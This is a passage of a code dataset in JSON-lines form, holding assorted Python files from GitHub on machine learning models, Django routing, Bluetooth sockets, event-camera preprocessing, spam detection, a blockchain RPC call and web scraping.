1\n\nX['Species_setosa'] = x1\nX['Species_virginica'] = x2\ny = df['Sepal.Width']\n\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\n\n\n\n\n\n\n\n","repo_name":"degru82/mlearn_visual","sub_path":"s01_stat/scripts_used/script05_linreg.py","file_name":"script05_linreg.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3149918652","text":"# encoding: utf-8\nimport math\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.nn import LayerNorm, TransformerEncoder, TransformerDecoderLayer, TransformerDecoder\n\n\nclass ChatBot(nn.Transformer):\n\n def __init__(self, vocab_size, d_model: int = 512, nhead: int = 8, num_encoder_layers: int = 6,\n num_decoder_layers: int = 6, dim_feedforward: int = 2048, dropout: float = 0.1,\n activation: str = \"relu\", custom_encoder=None, custom_decoder=None):\n super(ChatBot, self).__init__()\n self.dropout = dropout\n self.position_encoder = PositionEmbedding(d_model=d_model, dropout=dropout, max_len=80)\n self.emb = nn.Embedding(vocab_size, d_model)\n\n if custom_encoder is not None:\n self.encoder = custom_encoder\n else:\n from torch.nn import TransformerEncoderLayer\n encoder_layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout, activation)\n encoder_norm = LayerNorm(d_model)\n self.encoder = TransformerEncoder(encoder_layer, num_encoder_layers, encoder_norm)\n\n if custom_decoder is not None:\n self.decoder = custom_decoder\n else:\n decoder_layer = TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout, activation)\n decoder_norm = LayerNorm(d_model)\n self.decoder = TransformerDecoder(decoder_layer, num_decoder_layers, decoder_norm)\n\n self.d_model = d_model\n self.nhead = nhead\n self.pred = nn.Linear(d_model, vocab_size)\n self._reset_parameters()\n\n # 获取padding mask\n @staticmethod\n def get_pad_mask(seq, pad_idx):\n seq = seq.transpose(0, 1)\n mask = seq == pad_idx\n return mask\n\n @staticmethod\n def generate_square_subsequent_mask(dim=512, sz: int = 10):\n r\"\"\"Generate a square mask for the sequence. The masked positions are filled with float('-inf').\n Unmasked positions are filled with float(0.0).\n \"\"\"\n mask = (torch.triu(torch.ones(dim, sz, sz)) == 1).transpose(1, 2)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask.cuda()\n\n def forward(self, src, tgt, src_mask=None, tgt_mask=None, memory_mask=None, src_key_padding_mask=None,\n tgt_key_padding_mask=None, memory_key_padding_mask=None, pad_id=0):\n emb_src = self.emb(src)\n emb_tgt = self.emb(tgt)\n src_emb = self.position_encoder(emb_src)\n tgt_emb = self.position_encoder(emb_tgt)\n src_pad_mask = self.get_pad_mask(src, pad_id)\n tgt_pad_mask = self.get_pad_mask(tgt, pad_id)\n tgt_mask = self.generate_square_subsequent_mask(src.size(1) * self.nhead, tgt.size(0)) # heads=8\n memory = self.encoder(src_emb, src_key_padding_mask=src_pad_mask)\n output = self.decoder(tgt_emb, memory, tgt_mask=tgt_mask, tgt_key_padding_mask=tgt_pad_mask)\n pred = F.relu(self.pred(output))\n return pred\n\n @torch.no_grad()\n def predict(self, src, max_len, pad_id, cls_id, sep_id):\n emb_src = self.emb_src(src)\n src_emb = self.position_encoder(emb_src)\n src_pad_mask = self.get_pad_mask(src, pad_id)\n batch_size = src.size(1)\n stop_flag = [False] * batch_size\n memory = self.encoder(src_emb, src_key_padding_mask=src_pad_mask)\n tgt = torch.LongTensor([cls_id] * batch_size).unsqueeze(0).cuda() # [1, B]\n for idx in range(1, max_len + 1):\n bert_tgt = self.emb_tgt(tgt)\n tgt_emb = self.position_encoder(bert_tgt)\n tgt_mask = self.generate_square_subsequent_mask(src.size(1) * self.nhead, idx)\n output = self.decoder(tgt_emb, memory, tgt_mask=tgt_mask) # [1, B, E]\n pred = self.pred(output[-1, :, :]) # [B, V]\n next_token = torch.argmax(pred, -1).view(-1, 1)\n tgt = torch.cat([tgt, next_token], dim=0) # [S+1, B]\n for idx_, token_i in enumerate(next_token.squeeze(0)):\n if token_i == sep_id:\n stop_flag[idx_] = True\n if sum(stop_flag) == len(stop_flag):\n break\n return tgt\n\n\nclass PositionEmbedding(nn.Module):\n\n \"\"\"\n Position embedding for self-attention\n refer: https://pytorch.org/tutorials/beginner/transformer_tutorial.html\n\n d_model: word embedding size or output size of the self-attention blocks\n max_len: the max length of the input squeezec\n \"\"\"\n\n def __init__(self, d_model, dropout=0.5, max_len=100):\n super(PositionEmbedding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model) # [max_len, d_model]\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1) # [1, max_len]\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n","repo_name":"ITZWF/NLPS","sub_path":"ChatBotter/chatbot_model.py","file_name":"chatbot_model.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71233405609","text":"import math\n\ndef distance(point1, point2):\n acc = 0\n\n for i in range(len(point1)):\n acc += (float(point1[i]) - float(point2[i])) ** 2\n \n return math.sqrt(acc)\n\ndef nearest_neighbor(all_points, new_point):\n best_point = None\n best_distance = None\n\n for current_point in all_points:\n current_distance = distance(new_point, current_point)\n\n if best_distance is None or current_distance < best_distance:\n best_distance = current_distance\n best_point = current_point\n \n return best_point","repo_name":"zbaklund/CS419","sub_path":"hw02/KD_Util.py","file_name":"KD_Util.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26159057025","text":"import bluetooth\nimport subprocess\n\nclass BluetoothComm:\n def __init__(self):\n self.server_socket=bluetooth.BluetoothSocket( bluetooth.RFCOMM )\n port = 1\n self.server_socket.bind((\"\",port))\n self.server_socket.listen(1)\n self.client_socket,address = self.server_socket.accept()\n print(\"Accepted connection from \",address)\n \n def read_comm(self):\n res = self.client_socket.recv(1024)\n if len(res):\n return res\n else:\n return None\n \n def send_comm(self, text):\n self.client_socket.send(text)","repo_name":"analysis230/RasPi-Measuring-Device","sub_path":"bluetoothConnection.py","file_name":"bluetoothConnection.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"6336603046","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.views import defaults as default_views\nfrom django.contrib.sitemaps.views import sitemap\n\nfrom .sitemaps import StaticViewSitemap\n\n\nsitemaps = {\n 'static': StaticViewSitemap,\n}\n\nurlpatterns = [\n # General\n url(r'^$', TemplateView.as_view(template_name='pages/home.html'), name='home'),\n\n # Error pages\n url(r'^denied/$', TemplateView.as_view(template_name='pages/denied.html'), name='denied'),\n url(r'^error/$', TemplateView.as_view(template_name='pages/error.html'), name='error'),\n\n # Redirects for talking to Reddit\n url(r'^reddit/', include('never_saiddit.reddit.urls', namespace='reddit')),\n\n # User management\n url(r'^', include('never_saiddit.core.urls', namespace='core')),\n url(r'^users/', include('never_saiddit.users.urls', namespace='users')),\n url(r'^accounts/', include('allauth.urls')),\n\n # Special root-level files\n url(r'^robots\\.txt', include('robots.urls')),\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\n name='django.contrib.sitemaps.views.sitemap'),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception('Bad Request!')}),\n url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception('Permission Denied')}),\n url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception('Page not Found')}),\n url(r'^500/$', default_views.server_error),\n ]\n if 'debug_toolbar' in settings.INSTALLED_APPS:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n\n # Admin is only enabled in development. Unneccesary security risk in prod\n url('admin', admin.site.urls),\n","repo_name":"Damgaard/Never-Saiddit","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29582832532","text":"import datetime\nfrom typing import List, Any\nimport arrow\nfrom dateutil.parser import parse\nfrom dateutil.rrule import rrule\nfrom dateutil.rrule import DAILY\nfrom dateutil import tz\nfrom apps.log_esquery.type_constants import type_index_set_string, type_index_set_list\nfrom apps.log_search.models import Scenario\nfrom apps.utils.function import map_if\n\n\nclass QueryIndexOptimizer(object):\n def __init__(\n self,\n indices: type_index_set_string,\n scenario_id: str,\n start_time: datetime = None,\n end_time: datetime = None,\n time_zone: str = None,\n use_time_range: bool = True,\n ):\n self._index: str = \"\"\n if not indices:\n return\n\n indices = indices.replace(\" \", \"\")\n result_table_id_list: List[str] = map_if(indices.split(\",\"))\n # 根据查询场景优化index\n if scenario_id in [Scenario.BKDATA, Scenario.LOG]:\n # 日志采集使用0时区区分index入库,数据平台使用服务器所在时区\n time_zone = \"GMT\" if scenario_id == Scenario.LOG else tz.gettz()\n result_table_id_list = self.index_filter(result_table_id_list, start_time, end_time, time_zone)\n\n if not use_time_range:\n result_table_id_list = []\n\n self._index = \",\".join(result_table_id_list)\n\n if not self._index:\n\n map_func_map = {\n Scenario.LOG: lambda x: f\"{x}_*\",\n Scenario.BKDATA: lambda x: f\"{x}_*\",\n Scenario.ES: lambda x: f\"{x}\",\n }\n result_table_id_list: List[str] = map_if(indices.split(\",\"), map_func_map.get(scenario_id))\n\n self._index = \",\".join(result_table_id_list)\n if scenario_id in [Scenario.LOG]:\n self._index = self._index.replace(\".\", \"_\")\n\n @property\n def index(self):\n return self._index\n\n def index_filter(\n self, result_table_id_list: type_index_set_list, start_time: datetime, end_time: datetime, time_zone: str\n ) -> List[str]:\n # BkData索引集优化\n final_index_list: list = []\n for x in result_table_id_list:\n a_index_list: list = self.index_time_filter(x, start_time, end_time, time_zone)\n final_index_list = final_index_list + a_index_list\n return final_index_list\n\n def index_time_filter(\n self, index: str, date_start: datetime, date_end: datetime, time_zone: str\n ) -> type_index_set_list:\n date_start = date_start.to(time_zone).strftime(\"%Y%m%d000000\")\n date_end = date_end.to(time_zone).strftime(\"%Y%m%d%H%M%S\")\n now: datetime = arrow.now(time_zone).naive\n if parse(date_end) > now:\n date_end: str = now.strftime(\"%Y%m%d%H%M%S\")\n\n start, end = parse(date_start), parse(date_end)\n date_day_list: List[Any] = list(rrule(DAILY, interval=1, dtstart=start, until=end))\n # date_day_list.append(end)\n\n date_month_list: List[Any] = list(rrule(DAILY, interval=14, dtstart=start, until=end))\n # date_month_list.append(end)\n\n filter_list: type_index_set_list = self._generate_filter_list(\n index, date_day_list, date_month_list, date_end, now\n )\n return list(set(filter_list))\n\n def _generate_filter_list(self, index, date_day_list, date_month_list, date_end, now):\n filter_list: type_index_set_list = []\n if len(date_day_list) == 1:\n if date_day_list[0].strftime(\"%d\") != now.strftime(\"%d\"):\n date_day_list.append(parse(date_end))\n for x in date_day_list:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m%d\")))\n elif len(date_day_list) > 1 and len(date_month_list) == 1:\n if len(date_day_list) > 14:\n for x in date_month_list:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m\")))\n else:\n for x in date_day_list:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m%d\")))\n elif len(date_day_list) > 1 and len(date_month_list) > 1:\n if len(date_month_list) <= 6:\n for x in date_month_list:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m\")))\n else:\n for x in date_month_list[-6::1]:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m\")))\n return filter_list\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_esquery/esquery/builder/query_index_optimizer.py","file_name":"query_index_optimizer.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"34413975585","text":"# from backup.Small_UnetGated import UNetLWGated_lessc\nfrom Small_UnetGated import UNetLWGated\nimport torch\nfrom config import mdevice\n\nwidth = 1280\nheight = 720\n# width = 720\n# height = 480\n\nx=torch.randn(1,6,height,width).to(mdevice)\nfeature=torch.randn(1,6,height,width).to(mdevice)\nmask=torch.randn(1,6,height,width).to(mdevice)\nhisBuffer=torch.randn(3,4,height,width).to(mdevice)\nmodel = UNetLWGated(18, 3)\n# model.load_state_dict(torch.load(\"totalModel.290.pth.tar\")[\"state_dict\"])\nmodel = model.to(mdevice)\nmodel.eval()\ninput_names = [ \"input_x\",\"input_feature\",\"input_mask\",\"input_history\"]\noutput_names = [ \"output1\"]\nprint(model.conv1.conv_feature.weight[0,0])\n\ntorch.onnx.export(model, (x,feature,mask,hisBuffer),\n \"UNetGated.onnx\", verbose=True, input_names=input_names, output_names=output_names,opset_version=11)\n","repo_name":"fuxihao66/DX12WithTRT-legacy","sub_path":"OnnxGenerate/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29724654718","text":"import os\nimport torch\nfrom torch.utils.data import Dataset\nfrom transformers import PreTrainedTokenizer\n\nfrom utils.io import load_jsonl\nfrom utils.utils import logger\nfrom components.loaders.utils import convert_text_to_features\n\n\n# Prepare online dataset for training\nclass OnlineDataset(Dataset):\n def __init__(\n self, args, tokenizer: PreTrainedTokenizer, mode: str = \"train\"\n ) -> None:\n super().__init__()\n\n self.args = args\n\n file_path = os.path.join(\n self.args.data_dir, mode, \"data.jsonl\"\n )\n logger.info(\"LOOKING AT {}\".format(file_path))\n\n self.tokenizer = tokenizer\n self.data = load_jsonl(file_path)\n\n def __len__(self) -> int:\n return len(self.data)\n\n def __getitem__(self, index: int):\n # preprocessing data\n data_point = self.data[index]\n\n # 1. query\n query = data_point[\"query\"]\n\n # 2. document\n document = data_point[\"document\"]\n\n input_ids_query, attention_mask_query = convert_text_to_features(\n text=query,\n tokenizer=self.tokenizer,\n max_seq_len=self.args.max_seq_len_query,\n )\n input_ids_document, attention_mask_document = convert_text_to_features(\n text=document,\n tokenizer=self.tokenizer,\n max_seq_len=self.args.max_seq_len_document,\n )\n\n return (\n torch.tensor(input_ids_query, dtype=torch.long),\n torch.tensor(attention_mask_query, dtype=torch.long),\n torch.tensor(input_ids_document, dtype=torch.long),\n torch.tensor(attention_mask_document, dtype=torch.long),\n )\n","repo_name":"phuongnam2002/Spalde","sub_path":"components/loaders/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17431916924","text":"# -*- coding: utf-8 -*-\n'''\n图像采集程序-人脸检测\n由于外部程序需要调用它,所以不能使用相对路径\n\n'''\nimport argparse\nfrom A_Final_Sys.oldcare.audio import audioplayer\nfrom PIL import Image, ImageDraw, ImageFont\nimport cv2\nimport numpy as np\nimport os\nimport shutil\nimport time\n\n\ndef collect_faces(frame,error,action_list,action_map,\n start_time,limit_time,audio_dir,\n faceutil ):\n if error == 1:\n end_time = time.time()\n difference = end_time - start_time\n print(difference)\n if difference >= limit_time:\n error = 0\n\n face_location_list = faceutil.get_face_location(frame)\n for (left, top, right, bottom) in face_location_list:\n cv2.rectangle(frame, (left, top), (right, bottom),\n (0, 0, 255), 2)\n\n\n face_count = len(face_location_list)\n if error == 0 and face_count == 0: # 没有检测到人脸\n print('[WARNING] 没有检测到人脸')\n audioplayer.play_audio(os.path.join(audio_dir,\n 'no_face_detected.mp3'))\n error = 1\n start_time = time.time()\n elif error == 0 and face_count == 1: # 可以开始采集图像了\n print('[INFO] 可以开始采集图像了')\n audioplayer.play_audio(os.path.join(audio_dir,\n 'start_image_capturing.mp3'))\n # break\n elif error == 0 and face_count > 1: # 检测到多张人脸\n print('[WARNING] 检测到多张人脸')\n audioplayer.play_audio(os.path.join(audio_dir,\n 'multi_faces_detected.mp3'))\n error = 1\n start_time = time.time()\n else:\n pass\n#\n# # 新建目录\n# if os.path.exists(os.path.join(args['imagedir'], args['id'])):\n# shutil.rmtree(os.path.join(args['imagedir'], args['id']), True)\n# os.mkdir(os.path.join(args['imagedir'], args['id']))\n#\n# # 开始采集人脸\n# for action in action_list:\n# audioplayer.play_audio(os.path.join(audio_dir, action + '.mp3'))\n# action_name = action_map[action]\n#\n# counter = 1\n# for i in range(15):\n# print('%s-%d' % (action_name, i))\n# _, img_OpenCV = cam.read()\n# img_OpenCV = cv2.flip(img_OpenCV, 1)\n# origin_img = img_OpenCV.copy() # 保存时使用\n#\n# face_location_list = faceutil.get_face_location(img_OpenCV)\n# for (left, top, right, bottom) in face_location_list:\n# cv2.rectangle(img_OpenCV, (left, top),\n# (right, bottom), (0, 0, 255), 2)\n#\n# img_PIL = Image.fromarray(cv2.cvtColor(img_OpenCV,\n# cv2.COLOR_BGR2RGB))\n#\n# draw = ImageDraw.Draw(img_PIL)\n# draw.text((int(image.shape[1] / 2), 30), action_name,\n# font=ImageFont.truetype('C:\\\\Windows\\\\Fonts\\\\SIMLI.TTF', 40),\n# fill=(255, 0, 0)) # linux\n#\n# # 转换回OpenCV格式\n# img_OpenCV = cv2.cvtColor(np.asarray(img_PIL),\n# cv2.COLOR_RGB2BGR)\n#\n# cv2.imshow('Collecting Faces', img_OpenCV) # show the image\n#\n# image_name = os.path.join(args['imagedir'], args['id'],\n# action + '_' + str(counter) + '.jpg')\n# cv2.imwrite(image_name, origin_img)\n# # Press 'ESC' for exiting video\n# k = cv2.waitKey(100) & 0xff\n# if k == 27:\n# break\n# counter += 1\n#\n# # 结束\n# print('[INFO] 采集完毕')\n# audioplayer.play_audio(os.path.join(audio_dir, 'end_capturing.mp3'))\n#\n# # 释放全部资源\n# cam.release()\n# cv2.destroyAllWindows()\n","repo_name":"huijieXue1020/CVpart","sub_path":"oldcare/CV_part/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2782136513","text":"# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\n\ndef resolve():\n n, w = map(int, input().split())\n print(int(n//w))\n\nimport sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_入力例_1(self):\n input = \"\"\"10 3\"\"\"\n output = \"\"\"3\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_2(self):\n input = \"\"\"1000 1\"\"\"\n output = \"\"\"1000\"\"\"\n self.assertIO(input, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SakagamiKazuto/atcoder_practice","sub_path":"abc-a/abc186-a.py","file_name":"abc186-a.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"662483721","text":"# corpus_names = ['anaphor_with', 'anaphor_without', 'total']\nfrom util import *\nkfolds = load_corpus_list('total')\nk_folds_X_train = kfolds[0]\nk_folds_X_val = kfolds[1]\nk_folds_X_test = kfolds[2]\n\nfor x in range(len(k_folds_X_test)):\n to_check = k_folds_X_test[x]\n all_others = []\n for fold_i, fold in enumerate(k_folds_X_test):\n if fold_i != x:\n all_others = all_others + fold\n\n to_check_ids = [(test['id'], test['file_name']) for test in to_check]\n others_ids = [(test['id'], test['file_name']) for test in all_others]\n\n overlap = 0\n for v in to_check_ids:\n if v in others_ids:\n overlap += 1\n print(overlap)\n","repo_name":"jinhuang-de/BA-Resolving-comparative-anaphora-with-and-without-lexical-heads","sub_path":"src/data_preparation/show_k_folds.py","file_name":"show_k_folds.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71731841769","text":"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import metrics\nimport sys\nif not sys.warnoptions:\n import warnings\n warnings.simplefilter(\"ignore\")\n\n\ndataset = pd.read_csv('spam_ham_dataset.csv')\nprint(dataset.isnull().sum())\n\n\nimport re \n\nimport nltk\nstopWords = nltk.download('stopwords')\n\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\n\nfrom nltk.stem.porter import PorterStemmer\nps = PorterStemmer()\n\n\ncorpus = []\nfor i in range(len(dataset)):\n text = re.sub('[^a-zA-Z]',' ', dataset['text'][i])\n text = text.lower()\n text = text.split()\n text = [ps.stem(word) for word in text if not word in set(stopwords.words('english'))]\n text = ' '.join(text)\n corpus.append(text)\n \n\nfrom sklearn.feature_extraction.text import CountVectorizer\ncv = CountVectorizer(max_features = 2000)\n\nX = cv.fit_transform(corpus).toarray() \ny = dataset.iloc[:,-1:].values\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test,y_train,y_test = train_test_split(X, y,test_size=0.2, random_state=0)\n\n\n\nfrom xgboost import XGBClassifier\nmodel = XGBClassifier(n_estimators = 150, booster = 'gbtree')\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nprint('XGBoost Accuracy: ', metrics.accuracy_score(y_test, y_pred), '\\n')\nprint(\"XGBClassifier Confusion Matrix\\n\", confusion_matrix(y_test, y_pred))\n\ncross_val = cross_val_score(estimator = model, X = X_train, y = y_train, cv = 10)\nprint('XGB Accuracy: ', cross_val.mean())\nprint('XGB Std: ', cross_val.std())\n\n\n\n\n\nfrom sklearn.model_selection import GridSearchCV\n\nparams = [\n {'n_estimators' : [50,100,150,200, 250], 'booster' : ['gbtree', 'gblinear']}\n ]\n\n\n\ngs = GridSearchCV(\n estimator = model,\n param_grid = params,\n scoring = 'accuracy',\n cv = 10,\n n_jobs = -1\n )\n\n\n\ngrid_search = gs.fit(X_train, y_train)\nbest_result = grid_search.best_score_\nbest_params = grid_search.best_params_\n\nprint('Best_Result', best_result)\nprint('Best_Params', best_params)\n\n\nimport pickle\nsave = pickle.dump(model, open('model.save', 'wb'))\n","repo_name":"emreyesilyurt/spam-detection-with-NLP","sub_path":"spam_mail_detection.py","file_name":"spam_mail_detection.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19690728689","text":"# coding:utf-8\n# convet event streams to image like representation\nfrom itertools import repeat\n\nimport h5py\nimport numpy as np\nfrom tqdm import tqdm\nimport concurrent.futures\nimport os\nimport sys\nimport glob\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\nfrom config import Config\nimport convert_event_to_channel_image_tool\n\n\ndef generate_wrap_function(generate_function, file_path, data_name):\n data = np.loadtxt(file_path)\n image = generate_function(data)\n return image, data_name\n\n\ndef generate_event_img(hdf5_path, generate_function, data_names, path_list):\n f = h5py.File(hdf5_path, \"w\")\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for image, data_name in executor.map(generate_wrap_function, repeat(generate_function), path_list, data_names):\n f.create_dataset(name=data_name, data=image)\n # print(data_name)\n\n f.close()\n\n\nif __name__ == '__main__':\n\n # 保存的文件位置\n if not os.path.exists(Config.image_dir):\n os.makedirs(Config.image_dir)\n # 原始数据所在文件夹\n origin_dir = os.path.join(Config.data_dir, 'origin')\n\n path_list = []\n data_names = []\n for train_test in os.listdir(origin_dir):\n persons = os.listdir(os.path.join(origin_dir, train_test))\n for person in persons:\n txt_files = glob.glob(os.path.join(origin_dir, train_test, person, '*.txt'))\n # txt_files = os.listdir(os.path.join(origin_dir, scene, person))\n for txt_file in txt_files:\n # 读取的是原始数据\n file_path = os.path.join(origin_dir, train_test, person, txt_file)\n path_list.append(file_path)\n data_name = train_test + \"_\" + person + \"_\" + os.path.basename(txt_file)\n data_names.append(data_name)\n #break\n\n generate_event_img(Config.two_channels_counts_file, convert_event_to_channel_image_tool.generate_two_channels_count, data_names, path_list)\n generate_event_img(Config.two_channels_time_file, convert_event_to_channel_image_tool.generate_two_channels_time, data_names, path_list)\n generate_event_img(Config.four_channels_file, convert_event_to_channel_image_tool.generate_four_channels, data_names, path_list)\n generate_event_img(Config.two_channels_counts_and_time_file, convert_event_to_channel_image_tool.generate_two_channels_counts_and_time, data_names, path_list)\n\n # f = h5py.File(Config.two_channels_counts_file, \"w\")\n # with concurrent.futures.ProcessPoolExecutor() as executor:\n # for image, data_name in executor.map(generate_two_channels_count, path_list, data_names):\n # f.create_dataset(name=data_name, data=image)\n # # print(data_name)\n #\n # f.close()","repo_name":"zhangxiann/TPAMI_Gait_Identification","sub_path":"EV-Gait-IMG/make_hdf5.py","file_name":"make_hdf5.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"53"} +{"seq_id":"16459960683","text":"from web3 import Web3\nfrom web3py_ext import extend\n\nhost = \"https://api.baobab.klaytn.net:8651\"\n\ntransactionArgs = {\n \"from\": \"0x51239f87c33e95e3bdb72e31d06b5306bcec81cc\",\n \"to\": \"0x8c9f4468ae04fb3d79c80f6eacf0e4e1dd21deee\",\n \"value\": \"0x1\",\n \"gas\": \"0x9999\",\n \"maxFeePerGas\": \"0xbb43b7400\"\n}\n\nw3 = Web3(Web3.HTTPProvider(host))\neth_response = w3.eth.fill_transaction(transactionArgs)\n\nprint(eth_response)\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/rpc-specs/code-samples/python/eth/transaction/fillTransaction.py","file_name":"fillTransaction.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"16488229850","text":"import os\n\n\ndef scan_and_report(some_path):\n file_count = 0\n folder_count = 0\n for i in os.listdir(some_path):\n if os.path.isfile(some_path + i):\n file_count += 1\n elif os.path.isdir(some_path + i):\n folder_count += 1\n a, b = scan_and_report(some_path + i + \"\\\\\")\n file_count += a\n folder_count += b\n\n return file_count, folder_count\n\n\na, b = scan_and_report(\"D:\\\\\")\nprint(\"Files in the folder = \", a)\nprint(\"Folders in the folder = \", b)\n","repo_name":"vbelousPy/py_base","sub_path":"Lesson_05/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23904223598","text":"from selenium import webdriver #cong cu su dung\nfrom time import sleep\nfrom selenium.webdriver.common.keys import Keys #cong cu su dung\nfrom tqdm import tqdm\nimport json #cong cu su dung\n\n# khai bao bien\n\nbrowser = webdriver.Chrome(executable_path=\"chromedriver.exe\") #cong cu su dung\n# test open web\n\n#Domain chính của trang mà nhóm crawl dữ liệu\nbrowser.get(\n \"http://thuvienso.hcmute.edu.vn/cong-nghe-thong-tin/tat-ca-tai-lieu-cong-nghe-thong-tin-478-0.html\")\nbrowser.maximize_window()\nbrowser.execute_script(\"window.scrollBy(0,1000)\", \"\")\nsleep(5)\n\n#Phần chứa dữ liệu để crawl\nblockDocument = browser.find_element_by_xpath(\n '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[2]')\n#List dữ liệu để crawl\n# list_documents = browser.find_elements_by_xpath(\n# '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[2]/ul/li')\n# print(len(list_documents))\nlistOfDocuments = []\ncondition = True\ncount = 0\nwhile condition:\n\n # count += 1\n # if(count == 1183):\n # continue\n #List dữ liệu để crawl trong 1 page\n list_documents = browser.find_elements_by_xpath(\n '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[2]/ul/li')\n #lấy phần tử cuối.\n checkPage = browser.find_elements_by_xpath(\n '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[3]/ul/li')[-1]\n #lấy phần tử nextPage.\n lastPage = browser.find_elements_by_xpath(\n '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[3]/ul/li')[-2]\n # xxx = lastPage.find_element_by_tag_name('a').text\n for document in tqdm(list_documents):\n x = document.find_element_by_class_name('decs_book')\n y = document.find_element_by_class_name('txt_gray')\n # z = y.find_elements_by_class_name('txt_note')[1].text\n term = {\n \"documentTitle\": document.find_element_by_class_name('colorlink').text,\n \"documentDes\": x.find_element_by_tag_name(\"p\").text,\n \"documentSource\": 